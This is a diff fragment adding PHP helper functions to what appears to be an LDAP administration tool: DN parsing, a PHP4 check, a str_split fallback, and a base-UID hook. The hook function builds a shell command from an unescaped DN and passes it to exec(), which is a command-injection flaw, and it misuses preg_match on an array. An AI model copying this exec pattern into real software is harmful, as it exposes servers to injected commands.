+ $dn = preg_replace("/^[^,]+,/","",$dn);
+
+ $called = true;
+
+ /* Check if current dn is valid */
+ if($ldap!=NULL){
+ $ldap->cd($dn);
+ $ldap->cat($dn,array("dn"));
+ if($ldap->count()){
+ $ret[] = $keep.$object;
+ $keep = "";
+ }else{
+ $keep .= $object.",";
+ }
+ }else{
+ $ret[] = $keep.$object;
+ $keep = "";
+ }
+ }
+
+ /* No dn was posted */
+ if($cnt == 0 && !empty($dn)){
+ $ret[] = $dn;
+ }
+
+ /* Append the rest */
+ $test = $keep.$dn;
+ if($called && !empty($test)){
+ $ret[] = $keep.$dn;
+ }
+ $ret['count'] = count($ret) - 1;
+
+ return($ret);
+}
+
+function is_php4()
+{
+ return (preg_match('/^4/', phpversion()));
+}
+
+/* Add "str_split" if this function is missing.
+ * This function is only available in PHP5
+ */
+ if(!function_exists("str_split")){
+ function str_split($str,$length =1)
+ {
+ if($length < 1 ) $length =1;
+
+ $ret = array();
+ for($i = 0 ; $i < strlen($str); $i = $i +$length){
+ $ret[] = substr($str,$i ,$length);
+ }
+ return($ret);
+ }
+ }
+
+
+function get_base_from_hook($dn, $attrib)
+{
+ global $config;
+
+ if (isset($config->current['BASE_HOOK'])){
+
+ /* Call hook script - if present */
+ $command= $config->current['BASE_HOOK'];
+
+ if ($command != ""){
+ $command.= " '$dn' $attrib";
+ if (check_command($command)){
+ @DEBUG (DEBUG_SHELL, __LINE__, __FUNCTION__, __FILE__, $command, "Execute");
+ exec($command, $output);
+ if (preg_match("/^[0-9]+$/", $output)){
+ return ($output[0]);
+ } else {
+ print_red(_("Warning - base_hook is not avialable. Using default base."));
+ return ($config->current['UIDBASE']);
+ }
+ } else {
+ print_red(_("Warning - base_hook is not avialable. Using default base."));
+ return ($config->current['UIDBASE']);
+ }
+
+ } else {
+
+ print_red(_("Warning - no base_hook defined. Using default base."));
+ return ($config->current['UIDBASE']);
+
+ }
+ }
+}
+
// vim:tabstop=2:expandtab:shiftwidth=2:filetype=php:syntax:ruler:
?>